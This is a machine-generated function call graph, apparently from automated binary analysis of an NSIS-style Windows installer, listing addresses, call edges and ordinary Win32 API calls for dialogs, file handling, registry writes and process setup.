4215 404ebb 4216 40140b 2 API calls 4215->4216 4217 404ec4 4216->4217 4225 406507 lstrcpynW 4217->4225 4219 404ecb 4219->4197 4226 404d10 4220->4226 4222 404dee 4222->4174 4223->4213 4224->4215 4225->4219 4227 404d29 4226->4227 4228 406544 17 API calls 4227->4228 4229 404d8d 4228->4229 4230 406544 17 API calls 4229->4230 4231 404d98 4230->4231 4232 406544 17 API calls 4231->4232 4233 404dae lstrlenW wsprintfW SetDlgItemTextW 4232->4233 4233->4222 4234 4045d3 lstrlenW 4235 4045f2 4234->4235 4236 4045f4 WideCharToMultiByte 4234->4236 4235->4236 4237 404954 4238 404980 4237->4238 4239 404991 4237->4239 4298 405b4b GetDlgItemTextW 4238->4298 4241 40499d GetDlgItem 4239->4241 4247 4049fc 4239->4247 4242 4049b1 4241->4242 4246 4049c5 SetWindowTextW 4242->4246 4250 405e81 4 API calls 4242->4250 4243 404ae0 4296 404c8f 4243->4296 4300 405b4b GetDlgItemTextW 4243->4300 4244 40498b 4245 40678e 5 API calls 4244->4245 4245->4239 4251 404463 18 API calls 4246->4251 4247->4243 4252 406544 17 API calls 4247->4252 4247->4296 4249 4044ca 8 API calls 4254 404ca3 4249->4254 4255 4049bb 4250->4255 4256 4049e1 4251->4256 4257 404a70 SHBrowseForFolderW 4252->4257 4253 404b10 4258 405ede 18 API calls 4253->4258 4255->4246 4262 405dd6 3 API calls 4255->4262 4259 404463 18 API calls 4256->4259 4257->4243 4260 404a88 CoTaskMemFree 4257->4260 4261 404b16 4258->4261 4263 4049ef 4259->4263 4264 405dd6 3 API calls 4260->4264 4301 406507 lstrcpynW 4261->4301 4262->4246 4299 404498 SendMessageW 4263->4299 4266 404a95 4264->4266 4269 404acc SetDlgItemTextW 4266->4269 4273 406544 17 API calls 4266->4273 4268 4049f5 4271 4068d4 5 API calls 4268->4271 4269->4243 4270 404b2d 4272 4068d4 5 API calls 4270->4272 4271->4247 4279 404b34 4272->4279 4274 404ab4 lstrcmpiW 4273->4274 4274->4269 4276 404ac5 lstrcatW 4274->4276 4275 404b75 4302 406507 lstrcpynW 4275->4302 4276->4269 4278 404b7c 4280 405e81 4 API calls 4278->4280 4279->4275 4284 405e22 2 API calls 4279->4284 4285 404bcd 4279->4285 4281 404b82 GetDiskFreeSpaceW 4280->4281 4283 404ba6 MulDiv 4281->4283 4281->4285 4283->4285 4284->4279 4287 404dd9 20 API calls 4285->4287 4295 404c3e 4285->4295 4286 404c61 4303 404485 KiUserCallbackDispatcher 4286->4303 4289 404c2b 4287->4289 4288 40140b 2 API calls 4288->4286 4291 404c40 SetDlgItemTextW 4289->4291 4292 404c30 4289->4292 4291->4295 4293 404d10 20 API calls 4292->4293 4293->4295 4294 404c7d 4294->4296 4304 4048ad 4294->4304 4295->4286 4295->4288 4296->4249 4298->4244 4299->4268 4300->4253 4301->4270 4302->4278 4303->4294 4305 4048c0 SendMessageW 4304->4305 4306 4048bb 4304->4306 4305->4296 4306->4305 4307 401956 4308 402da6 17 API calls 4307->4308 4309 40195d lstrlenW 4308->4309 4310 402638 4309->4310 4311 4014d7 4312 402d84 17 API calls 4311->4312 4313 4014dd Sleep 4312->4313 4315 402c2a 4313->4315 3988 4020d8 3989 40219c 3988->3989 3990 4020ea 3988->3990 3992 401423 24 API calls 3989->3992 3991 402da6 17 API calls 3990->3991 3993 4020f1 3991->3993 3999 4022f6 3992->3999 3994 402da6 17 API calls 3993->3994 3995 4020fa 3994->3995 3996 402110 LoadLibraryExW 3995->3996 3997 402102 GetModuleHandleW 3995->3997 3996->3989 3998 402121 3996->3998 3997->3996 3997->3998 4008 406943 3998->4008 4002 402132 4005 401423 24 API calls 4002->4005 4006 402142 4002->4006 4003 40216b 4004 405569 24 API calls 4003->4004 4004->4006 4005->4006 4006->3999 4007 40218e FreeLibrary 4006->4007 4007->3999 4013 406529 WideCharToMultiByte 4008->4013 4010 406960 4011 406967 GetProcAddress 4010->4011 4012 40212c 4010->4012 4011->4012 4012->4002 4012->4003 4013->4010 4316 402b59 4317 402b60 4316->4317 4318 402bab 4316->4318 4321 402d84 17 API calls 4317->4321 4324 402ba9 4317->4324 4319 4068d4 5 API calls 4318->4319 4320 402bb2 4319->4320 4322 402da6 17 API calls 4320->4322 4323 402b6e 4321->4323 4325 402bbb 4322->4325 4326 402d84 17 API calls 4323->4326 4325->4324 4327 402bbf IIDFromString 4325->4327 4329 402b7a 4326->4329 4327->4324 4328 402bce 4327->4328 4328->4324 4334 406507 lstrcpynW 4328->4334 4333 40644e wsprintfW 4329->4333 4331 402beb CoTaskMemFree 4331->4324 4333->4324 4334->4331 4335 402a5b 4336 402d84 17 API calls 4335->4336 4337 402a61 4336->4337 4338 402aa4 4337->4338 4339 402a88 4337->4339 4347 40292e 4337->4347 4341 402abe 4338->4341 4342 402aae 4338->4342 4340 402a8d 4339->4340 4343 402a9e 4339->4343 4349 406507 lstrcpynW 4340->4349 4345 406544 17 API calls 4341->4345 4344 402d84 17 API calls 4342->4344 4343->4347 4350 40644e wsprintfW 4343->4350 4344->4343 4345->4343 4349->4347 4350->4347 4037 40175c 4038 402da6 17 API calls 4037->4038 4039 401763 4038->4039 4040 406026 2 API calls 4039->4040 4041 40176a 4040->4041 4042 406026 2 API calls 4041->4042 4042->4041 4351 401d5d 4352 402d84 17 API calls 4351->4352 4353 401d6e SetWindowLongW 4352->4353 4354 402c2a 4353->4354 4355 4054dd 4356 405501 4355->4356 4357 4054ed 4355->4357 4360 405509 IsWindowVisible 4356->4360 4366 405520 4356->4366 4358 4054f3 4357->4358 4359 40554a 4357->4359 4361 4044af SendMessageW 4358->4361 4363 40554f CallWindowProcW 4359->4363 4360->4359 4362 405516 4360->4362 4364 4054fd 4361->4364 4365 404e1e 5 API calls 4362->4365 4363->4364 4365->4366 4366->4363 4367 404e9e 4 API calls 4366->4367 4367->4359 4043 401ede 4044 402d84 17 API calls 4043->4044 4045 401ee4 4044->4045 4046 402d84 17 API calls 4045->4046 4047 401ef0 4046->4047 4048 401f07 EnableWindow 4047->4048 4049 401efc ShowWindow 4047->4049 4050 402c2a 4048->4050 4049->4050 4368 4028de 4369 4028e6 4368->4369 4370 4028ea FindNextFileW 4369->4370 4372 4028fc 4369->4372 4371 402943 4370->4371 4370->4372 4374 406507 lstrcpynW 4371->4374 4374->4372 4382 401563 4383 402ba4 4382->4383 4386 40644e wsprintfW 4383->4386 4385 402ba9 4386->4385 3447 403f64 3448 403f7c 3447->3448 3449 4040dd 3447->3449 3448->3449 3452 403f88 3448->3452 3450 40412e 3449->3450 3451 4040ee GetDlgItem GetDlgItem 3449->3451 3454 404188 3450->3454 3466 401389 2 API calls 3450->3466 3453 404463 18 API calls 3451->3453 3455 403f93 SetWindowPos 3452->3455 3456 403fa6 3452->3456 3457 404118 SetClassLongW 3453->3457 3467 4040d8 3454->3467 3520 4044af 3454->3520 3455->3456 3459 403ff1 3456->3459 3460 403faf ShowWindow 3456->3460 3463 40140b 2 API calls 3457->3463 3464 404010 3459->3464 3465 403ff9 DestroyWindow 3459->3465 3461 4040ca 3460->3461 3462 403fcf GetWindowLongW 3460->3462 3542 4044ca 3461->3542 3462->3461 3468 403fe8 ShowWindow 3462->3468 3463->3450 3470 404015 SetWindowLongW 3464->3470 3471 404026 3464->3471 3469 4043ec 3465->3469 3472 404160 3466->3472 3468->3459 3469->3467 3478 40441d ShowWindow 3469->3478 3470->3467 3471->3461 3476 404032 GetDlgItem 3471->3476 3472->3454 3477 404164 SendMessageW 3472->3477 3474 40140b 2 API calls 3489 40419a 3474->3489 3475 4043ee DestroyWindow EndDialog 3475->3469 3479 404060 3476->3479 3480 404043 SendMessageW IsWindowEnabled 3476->3480 3477->3467 3478->3467 3482 40406d 3479->3482 3484 4040b4 SendMessageW 3479->3484 3485 404080 3479->3485 3493 404065 3479->3493 3480->3467 3480->3479 3481 406544 17 API calls 3481->3489 3482->3484 3482->3493 3484->3461 3486 404088 3485->3486 3487 40409d 3485->3487 3536 40140b 3486->3536 3491 40140b 2 API calls 3487->3491 3488 40409b 3488->3461 3489->3467 3489->3474 3489->3475 3489->3481 3492 404463 18 API calls 3489->3492 3511 40432e DestroyWindow 3489->3511 3523 404463 3489->3523 3494 4040a4 3491->3494 3492->3489 3539 40443c 3493->3539 3494->3461 3494->3493 3496 404215 GetDlgItem 3497 404232 ShowWindow KiUserCallbackDispatcher 3496->3497 3498 40422a 3496->3498 3526 404485 KiUserCallbackDispatcher 3497->3526 3498->3497 3500 40425c EnableWindow 3505 404270 3500->3505 3501 404275 GetSystemMenu EnableMenuItem SendMessageW 3502 4042a5 SendMessageW 3501->3502 3501->3505 3502->3505 3505->3501 3527 404498 SendMessageW 3505->3527 3528 403f45 3505->3528 3531 406507 lstrcpynW 3505->3531 3507 4042d4 lstrlenW 3508 406544 17 API calls 3507->3508 3509 4042ea SetWindowTextW 3508->3509 3532 401389 3509->3532 3511->3469 3512 404348 CreateDialogParamW 3511->3512 3512->3469 3513 40437b 3512->3513 3514 404463 18 API calls 3513->3514 3515 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3514->3515 3516 401389 2 API calls 3515->3516 3517 4043cc 3516->3517 3517->3467 3518 4043d4 ShowWindow 3517->3518 3519 4044af SendMessageW 3518->3519 3519->3469 3521 4044c7 3520->3521 3522 4044b8 SendMessageW 3520->3522 3521->3489 3522->3521 3524 406544 17 API calls 3523->3524 3525 40446e SetDlgItemTextW 3524->3525 3525->3496 3526->3500 3527->3505 3529 406544 17 API calls 3528->3529 3530 403f53 SetWindowTextW 3529->3530 3530->3505 3531->3507 3534 401390 3532->3534 3533 4013fe 3533->3489 3534->3533 3535 4013cb MulDiv SendMessageW 3534->3535 3535->3534 3537 401389 2 API calls 3536->3537 3538 401420 3537->3538 3538->3493 3540 404443 3539->3540 3541 404449 SendMessageW 3539->3541 3540->3541 3541->3488 3543 4044e2 GetWindowLongW 3542->3543 3544 40458d 3542->3544 3543->3544 3545 4044f7 3543->3545 3544->3467 3545->3544 3546 404524 GetSysColor 3545->3546 3547 404527 3545->3547 3546->3547 3548 404537 SetBkMode 3547->3548 3549 40452d SetTextColor 3547->3549 3550 404555 3548->3550 3551 40454f GetSysColor 3548->3551 3549->3548 3552 404566 3550->3552 3553 40455c SetBkColor 3550->3553 3551->3550 3552->3544 3554 404580 CreateBrushIndirect 3552->3554 3555 404579 DeleteObject 3552->3555 3553->3552 3554->3544 3555->3554 4387 401968 4388 402d84 17 API calls 4387->4388 4389 40196f 4388->4389 4390 402d84 17 API calls 4389->4390 4391 40197c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 401993 lstrlenW 4392->4393 4394 4019a4 4393->4394 4395 4019e5 4394->4395 4399 406507 lstrcpynW 4394->4399 4397 4019d5 4397->4395 4398 4019da lstrlenW 4397->4398 4398->4395 4399->4397 4400 40166a 4401 402da6 17 API calls 4400->4401 4402 401670 4401->4402 4403 40683d 2 API calls 4402->4403 4404 401676 4403->4404 4405 402aeb 4406 402d84 17 API calls 4405->4406 4407 402af1 4406->4407 4408 406544 17 API calls 4407->4408 4409 40292e 4407->4409 4408->4409 4410 4026ec 4411 402d84 17 API calls 4410->4411 4412 4026fb 4411->4412 4413 402745 ReadFile 4412->4413 4414 40607a ReadFile 4412->4414 4415 402785 MultiByteToWideChar 4412->4415 4416 40283a 4412->4416 4419 4027ab SetFilePointer MultiByteToWideChar 4412->4419 4420 40284b 4412->4420 4422 402838 4412->4422 4423 4060d8 SetFilePointer 4412->4423 4413->4412 4413->4422 4414->4412 4415->4412 4432 40644e wsprintfW 4416->4432 4419->4412 4421 40286c SetFilePointer 4420->4421 4420->4422 4421->4422 4424 4060f4 4423->4424 4425 40610c 4423->4425 4426 40607a ReadFile 4424->4426 4425->4412 4427 406100 4426->4427 4427->4425 4428 406115 SetFilePointer 4427->4428 4429 40613d SetFilePointer 4427->4429 4428->4429 4430 406120 4428->4430 4429->4425 4431 4060a9 WriteFile 4430->4431 4431->4425 4432->4422 3699 40176f 3700 402da6 17 API calls 3699->3700 3701 401776 3700->3701 3702 401796 3701->3702 3703 40179e 3701->3703 3738 406507 lstrcpynW 3702->3738 3739 406507 lstrcpynW 3703->3739 3706 40179c 3710 40678e 5 API calls 3706->3710 3707 4017a9 3708 405dd6 3 API calls 3707->3708 3709 4017af lstrcatW 3708->3709 3709->3706 3714 4017bb 3710->3714 3711 40683d 2 API calls 3711->3714 3712 405fd2 2 API calls 3712->3714 3714->3711 3714->3712 3715 4017cd CompareFileTime 3714->3715 3716 40188d 3714->3716 3722 406507 lstrcpynW 3714->3722 3725 406544 17 API calls 3714->3725 3734 401864 3714->3734 3737 405ff7 GetFileAttributesW CreateFileW 3714->3737 3740 405b67 3714->3740 3715->3714 3717 405569 24 API calls 3716->3717 3719 401897 3717->3719 3718 405569 24 API calls 3736 401879 3718->3736 3720 4032b4 35 API calls 3719->3720 3721 4018aa 3720->3721 3723 4018be SetFileTime 3721->3723 3724 4018d0 CloseHandle 3721->3724 3722->3714 3723->3724 3726 4018e1 3724->3726 3724->3736 3725->3714 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406544 17 API calls 3727->3729 3730 406544 17 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3732->3733 3735 405b67 MessageBoxIndirectW 3733->3735 3734->3718 3734->3736 3735->3736 3737->3714 3738->3706 3739->3707 3741 405b7c 3740->3741 3742 405bc8 3741->3742 3743 405b90 MessageBoxIndirectW 3741->3743 3742->3714 3743->3742 4440 401a72 4441 402d84 17 API calls 4440->4441 4442 401a7b 4441->4442 4443 402d84 17 API calls 4442->4443 4444 401a20 4443->4444 4445 401573 4446 401583 ShowWindow 4445->4446 4447 40158c 4445->4447 4446->4447 4448 40159a ShowWindow 4447->4448 4449 402c2a 4447->4449 4448->4449 4450 403b74 4451 403b7f 4450->4451 4452 403b86 GlobalAlloc 4451->4452 4453 403b83 4451->4453 4452->4453 4454 4023f4 4455 402da6 17 API calls 4454->4455 4456 402403 4455->4456 4457 402da6 17 API calls 4456->4457 4458 40240c 4457->4458 4459 402da6 17 API calls 4458->4459 4460 402416 GetPrivateProfileStringW 4459->4460 4461 4014f5 SetForegroundWindow 4462 402c2a 4461->4462 4463 401ff6 4464 402da6 17 API calls 4463->4464 4465 401ffd 4464->4465 4466 40683d 2 API calls 4465->4466 4467 402003 4466->4467 4469 402014 4467->4469 4470 40644e wsprintfW 4467->4470 4470->4469 3754 4034f7 SetErrorMode GetVersionExW 3755 403581 3754->3755 3756 403549 GetVersionExW 3754->3756 3757 4035da 3755->3757 3758 4068d4 5 API calls 3755->3758 3756->3755 3759 406864 3 API calls 3757->3759 3758->3757 3760 4035f0 lstrlenA 3759->3760 3760->3757 3761 403600 3760->3761 3762 4068d4 5 API calls 3761->3762 3763 403607 3762->3763 3764 4068d4 5 API calls 3763->3764 3765 40360e 3764->3765 3766 4068d4 5 API calls 3765->3766 3767 40361a #17 OleInitialize SHGetFileInfoW 3766->3767 3845 406507 lstrcpynW 3767->3845 3770 403667 GetCommandLineW 3846 406507 lstrcpynW 3770->3846 3772 403679 3773 405e03 CharNextW 3772->3773 3774 40369f CharNextW 3773->3774 3780 4036b0 3774->3780 3775 4037ae 3776 4037c2 GetTempPathW 3775->3776 3847 4034c6 3776->3847 3778 4037da 3781 403834 DeleteFileW 3778->3781 3782 4037de GetWindowsDirectoryW lstrcatW 3778->3782 3779 405e03 CharNextW 3779->3780 3780->3775 3780->3779 3787 4037b0 3780->3787 3857 40307d GetTickCount GetModuleFileNameW 3781->3857 3784 4034c6 12 API calls 3782->3784 3785 4037fa 3784->3785 3785->3781 3786 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3785->3786 3790 4034c6 12 API calls 3786->3790 3941 406507 lstrcpynW 3787->3941 3788 403847 3789 40390b 3788->3789 3791 4038fc 3788->3791 3795 405e03 CharNextW 3788->3795 3946 403adc 3789->3946 3794 40382c 3790->3794 3885 403bb6 3791->3885 3794->3781 3794->3789 3812 403869 3795->3812 3798 403a33 3800 405b67 MessageBoxIndirectW 3798->3800 3799 403a48 3801 403a50 GetCurrentProcess OpenProcessToken 3799->3801 3802 403ac6 ExitProcess 3799->3802 3806 403a40 ExitProcess 3800->3806 3807 403a96 3801->3807 3808 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3801->3808 3804 4038d2 3809 405ede 18 API calls 3804->3809 3805 403913 3811 405ad2 5 API calls 3805->3811 3810 4068d4 5 API calls 3807->3810 3808->3807 3813 4038de 3809->3813 3814 403a9d 3810->3814 3815 403918 lstrcatW 3811->3815 3812->3804 3812->3805 3813->3789 3942 406507 lstrcpynW 3813->3942 3816 403ab2 ExitWindowsEx 3814->3816 3821 403abf 3814->3821 3817 403934 lstrcatW lstrcmpiW 3815->3817 3818 403929 lstrcatW 3815->3818 3816->3802 3816->3821 3817->3789 3819 403954 3817->3819 3818->3817 3822 403960 3819->3822 3823 403959 3819->3823 3825 40140b 2 API calls 3821->3825 3827 405ab5 2 API calls 3822->3827 3826 405a38 4 API calls 3823->3826 3824 4038f1 3943 406507 lstrcpynW 3824->3943 3825->3802 3829 40395e 3826->3829 3830 403965 SetCurrentDirectoryW 3827->3830 3829->3830 3831 403982 3830->3831 3832 403977 3830->3832 3945 406507 lstrcpynW 3831->3945 3944 406507 lstrcpynW 3832->3944 3835 406544 17 API calls 3836 4039c4 DeleteFileW 3835->3836 3837 4039d0 CopyFileW 3836->3837 3842 40398f 3836->3842 3837->3842 3838 403a1a 3840 4062c7 36 API calls 3838->3840 3839 4062c7 36 API calls 3839->3842 3840->3789 3841 406544 17 API calls 3841->3842 3842->3835 3842->3838 3842->3839 3842->3841 3843 405aea 2 API calls 3842->3843 3844 403a04 CloseHandle 3842->3844 3843->3842 3844->3842 3845->3770 3846->3772 3848 40678e 5 API calls 3847->3848 3849 4034d2 3848->3849 3850 4034dc 3849->3850 3851 405dd6 3 API calls 3849->3851 3850->3778 3852 4034e4 3851->3852 3853 405ab5 2 API calls 3852->3853 3854 4034ea 3853->3854 3953 406026 3854->3953 3957 405ff7 GetFileAttributesW CreateFileW 3857->3957 3859 4030bd 3860 4030cd 3859->3860 3958 406507 lstrcpynW 3859->3958 3860->3788 3862 4030e3 3863 405e22 2 API calls 3862->3863 3864 4030e9 3863->3864 3959 406507 lstrcpynW 3864->3959 3866 4030f4 GetFileSize 3881 4031ee 3866->3881 3884 40310b 3866->3884 3868 4031f7 3868->3860 3870 403227 GlobalAlloc 3868->3870 3972 4034af SetFilePointer 3868->3972 3869 403499 ReadFile 3869->3884 3971 4034af SetFilePointer 3870->3971 3872 40325a 3874 403019 6 API calls 3872->3874 3874->3860 3875 403210 3877 403499 ReadFile 3875->3877 3876 403242 3878 4032b4 35 API calls 3876->3878 3879 40321b 3877->3879 3882 40324e 3878->3882 3879->3860 3879->3870 3880 403019 6 API calls 3880->3884 3960 403019 3881->3960 3882->3860 3882->3882 3883 40328b SetFilePointer 3882->3883 3883->3860 3884->3860 3884->3869 3884->3872 3884->3880 3884->3881 3886 4068d4 5 API calls 3885->3886 3887 403bca 3886->3887 3888 403bd0 3887->3888 3889 403be2 3887->3889 3981 40644e wsprintfW 3888->3981 3890 4063d5 3 API calls 3889->3890 3891 403c12 3890->3891 3893 403c31 lstrcatW 3891->3893 3895 4063d5 3 API calls 3891->3895 3894 403be0 3893->3894 3973 403e8c 3894->3973 3895->3893 3898 405ede 18 API calls 3899 403c63 3898->3899 3900 403cf7 3899->3900 3902 4063d5 3 API calls 3899->3902 3901 405ede 18 API calls 3900->3901 3903 403cfd 3901->3903 3904 403c95 3902->3904 3905 403d0d LoadImageW 3903->3905 3906 406544 17 API calls 3903->3906 3904->3900 3909 403cb6 lstrlenW 3904->3909 3913 405e03 CharNextW 3904->3913 3907 403db3 3905->3907 3908 403d34 RegisterClassW 3905->3908 3906->3905 3912 40140b 2 API calls 3907->3912 3910 403dbd 3908->3910 3911 403d6a SystemParametersInfoW CreateWindowExW 3908->3911 3914 403cc4 lstrcmpiW 3909->3914 3915 403cea 3909->3915 3910->3789 3911->3907 3916 403db9 3912->3916 3917 403cb3 3913->3917 3914->3915 3918 403cd4 GetFileAttributesW 3914->3918 3919 405dd6 3 API calls 3915->3919 3916->3910 3922 403e8c 18 API calls 3916->3922 3917->3909 3921 403ce0 3918->3921 3920 403cf0 3919->3920 3982 406507 lstrcpynW 3920->3982 3921->3915 3925 405e22 2 API calls 3921->3925 3923 403dca 3922->3923 3926 403dd6 ShowWindow 3923->3926 3927 403e59 3923->3927 3925->3915 3928 406864 3 API calls 3926->3928 3929 40563c 5 API calls 3927->3929 3930 403dee 3928->3930 3931 403e5f 3929->3931 3934 403dfc GetClassInfoW 3930->3934 3936 406864 3 API calls 3930->3936 3932 403e63 3931->3932 3933 403e7b 3931->3933 3932->3910 3939 40140b 2 API calls 3932->3939 3935 40140b 2 API calls 3933->3935 3937 403e10 GetClassInfoW RegisterClassW 3934->3937 3938 403e26 DialogBoxParamW 3934->3938 3935->3910 3936->3934 3937->3938 3940 40140b 2 API calls 3938->3940 3939->3910 3940->3910 3941->3776 3942->3824 3943->3791 3944->3831 3945->3842 3947 403af4 3946->3947 3948 403ae6 CloseHandle 3946->3948 3984 403b21 3947->3984 3948->3947 3951 405c13 67 API calls 3952 403a28 OleUninitialize 3951->3952 3952->3798 3952->3799 3954 406033 GetTickCount GetTempFileNameW 3953->3954 3955 4034f5 3954->3955 3956 406069 3954->3956 3955->3778 3956->3954 3956->3955 3957->3859 3958->3862 3959->3866 3961 403022 3960->3961 3962 40303a 3960->3962 3963 403032 3961->3963 3964 40302b DestroyWindow 3961->3964 3965 403042 3962->3965 3966 40304a GetTickCount 3962->3966 3963->3868 3964->3963 3967 406910 2 API calls 3965->3967 3968 403058 CreateDialogParamW ShowWindow 3966->3968 3969 40307b 3966->3969 3970 403048 3967->3970 3968->3969 3969->3868 3970->3868 3971->3876 3972->3875 3974 403ea0 3973->3974 3983 40644e wsprintfW 3974->3983 3976 403f11 3977 403f45 18 API calls 3976->3977 3979 403f16 3977->3979 3978 403c41 3978->3898 3979->3978 3980 406544 17 API calls 3979->3980 3980->3979 3981->3894 3982->3900 3983->3976 3985 403b2f 3984->3985 3986 403af9 3985->3986 3987 403b34 FreeLibrary GlobalFree 3985->3987 3986->3951 3987->3986 3987->3987 4471 401b77 4472 402da6 17 API calls 4471->4472 4473 401b7e 4472->4473 4474 402d84 17 API calls 4473->4474 4475 401b87 wsprintfW 4474->4475 4476 402c2a 4475->4476 4477 40167b 4478 402da6 17 API calls 4477->4478 4479 401682 4478->4479 4480 402da6 17 API calls 4479->4480 4481 40168b 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401694 MoveFileW 4482->4483 4484 4016a7 4483->4484 4490 4016a0 4483->4490 4485 4022f6 4484->4485 4486 40683d 2 API calls 4484->4486 4488 4016b6 4486->4488 4487 401423 24 API calls 4487->4485 4488->4485 4489 4062c7 36 API calls 4488->4489 4489->4490 4490->4487 4491 406bfe 4492 406a82 4491->4492 4493 4073ed 4492->4493 4494 406b03 GlobalFree 4492->4494 4495 406b0c GlobalAlloc 4492->4495 4496 406b83 GlobalAlloc 4492->4496 4497 406b7a GlobalFree 4492->4497 4494->4495 4495->4492 4495->4493 4496->4492 4496->4493 4497->4496 4498 4019ff 4499 402da6 17 API calls 4498->4499 4500 401a06 4499->4500 4501 402da6 17 API calls 4500->4501 4502 401a0f 4501->4502 4503 401a16 lstrcmpiW 4502->4503 4504 401a28 lstrcmpW 4502->4504 4505 401a1c 4503->4505 4504->4505 4506 4022ff 4507 402da6 17 API calls 4506->4507 4508 402305 4507->4508 4509 402da6 17 API calls 4508->4509 4510 40230e 4509->4510 4511 402da6 17 API calls 4510->4511 4512 402317 4511->4512 4513 40683d 2 API calls 4512->4513 4514 402320 4513->4514 4515 402331 lstrlenW lstrlenW 4514->4515 4516 402324 4514->4516 4518 405569 24 API calls 4515->4518 4517 405569 24 API calls 4516->4517 4519 40232c 4516->4519 4517->4519 4520 40236f SHFileOperationW 4518->4520 4520->4516 4520->4519 4521 401000 4522 401037 BeginPaint GetClientRect 4521->4522 4523 40100c DefWindowProcW 4521->4523 4525 4010f3 4522->4525 4526 401179 4523->4526 4527 401073 CreateBrushIndirect FillRect DeleteObject 4525->4527 4528 4010fc 4525->4528 4527->4525 4529 401102 CreateFontIndirectW 4528->4529 4530 401167 EndPaint 4528->4530 4529->4530 4531 401112 6 API calls 4529->4531 4530->4526 4531->4530 4532 401d81 4533 401d94 GetDlgItem 4532->4533 4534 401d87 4532->4534 4536 401d8e 4533->4536 4535 402d84 17 API calls 4534->4535 4535->4536 4537 401dd5 GetClientRect LoadImageW SendMessageW 4536->4537 4538 402da6 17 API calls 4536->4538 4540 401e33 4537->4540 4542 401e3f 4537->4542 4538->4537 4541 401e38 DeleteObject 4540->4541 4540->4542 4541->4542 4543 401503 4544 40150b 4543->4544 4546 40151e 4543->4546 4545 402d84 17 API calls 4544->4545 4545->4546 4547 402383 4548 40238a 4547->4548 4551 40239d 4547->4551 4549 406544 17 API calls 4548->4549 4550 402397 4549->4550 4552 405b67 MessageBoxIndirectW 4550->4552 4552->4551 4553 402c05 SendMessageW 4554 402c2a 4553->4554 4555 402c1f InvalidateRect 4553->4555 4555->4554 3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4563 40290b 4564 402da6 17 API calls 4563->4564 4565 402912 FindFirstFileW 4564->4565 4566 40293a 4565->4566 4569 402925 4565->4569 4571 40644e wsprintfW 4566->4571 4568 402943 4572 406507 lstrcpynW 4568->4572 4571->4568 4572->4569 4573 40190c 4574 401943 4573->4574 4575 402da6 17 API calls 4574->4575 4576 401948 4575->4576 4577 405c13 67 API calls 4576->4577 4578 401951 4577->4578 4579 40490d 4580 404943 4579->4580 4581 40491d 4579->4581 4583 4044ca 8 API calls 4580->4583 4582 404463 18 API calls 4581->4582 4584 40492a SetDlgItemTextW 4582->4584 4585 40494f 4583->4585 4584->4580 4586 40190f 4587 402da6 17 API calls 4586->4587 4588 401916 4587->4588 4589 405b67 MessageBoxIndirectW 4588->4589 4590 40191f 4589->4590 4591 401491 4592 405569 24 API calls 4591->4592 4593 401498 4592->4593 4594 402891 4595 402898 4594->4595 4597 402ba9 4594->4597 4596 402d84 17 API calls 4595->4596 4598 40289f 4596->4598 4599 4028ae SetFilePointer 4598->4599 4599->4597 4600 4028be 4599->4600 4602 40644e wsprintfW 4600->4602 4602->4597 4603 401f12 4604 402da6 17 API calls 4603->4604 4605 401f18 4604->4605 4606 402da6 17 API calls 4605->4606 4607 401f21 4606->4607 4608 402da6 17 API calls 4607->4608 4609 401f2a 4608->4609 4610 402da6 17 API calls 4609->4610 4611 401f33 4610->4611 4612 401423 24 API calls 4611->4612 4613 401f3a 4612->4613 4620 405b2d ShellExecuteExW 4613->4620 4615 401f82 4616 40292e 4615->4616 4617 40697f 5 API calls 4615->4617 4618 401f9f CloseHandle 4617->4618 4618->4616 4620->4615 4621 402f93 4622 402fa5 SetTimer 4621->4622 4623 402fbe 4621->4623 4622->4623 4624 403013 4623->4624 4625 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4623->4625 4625->4624 4626 401d17 4627 402d84 17 API calls 4626->4627 4628 401d1d IsWindow 4627->4628 4629 401a20 4628->4629 4630 404599 lstrcpynW lstrlenW 4014 401b9b 4015 401bec 4014->4015 4020 401ba8 4014->4020 4016 401c16 GlobalAlloc 4015->4016 4017 401bf1 4015->4017 4018 406544 17 API calls 4016->4018 4027 40239d 4017->4027 4035 406507 lstrcpynW 4017->4035 4022 401c31 4018->4022 4019 406544 17 API calls 4023 402397 4019->4023 4020->4022 4024 401bbf 4020->4024 4022->4019 4022->4027 4028 405b67 MessageBoxIndirectW 4023->4028 4033 406507 lstrcpynW 4024->4033 4025 401c03 GlobalFree 4025->4027 4028->4027 4029 401bce 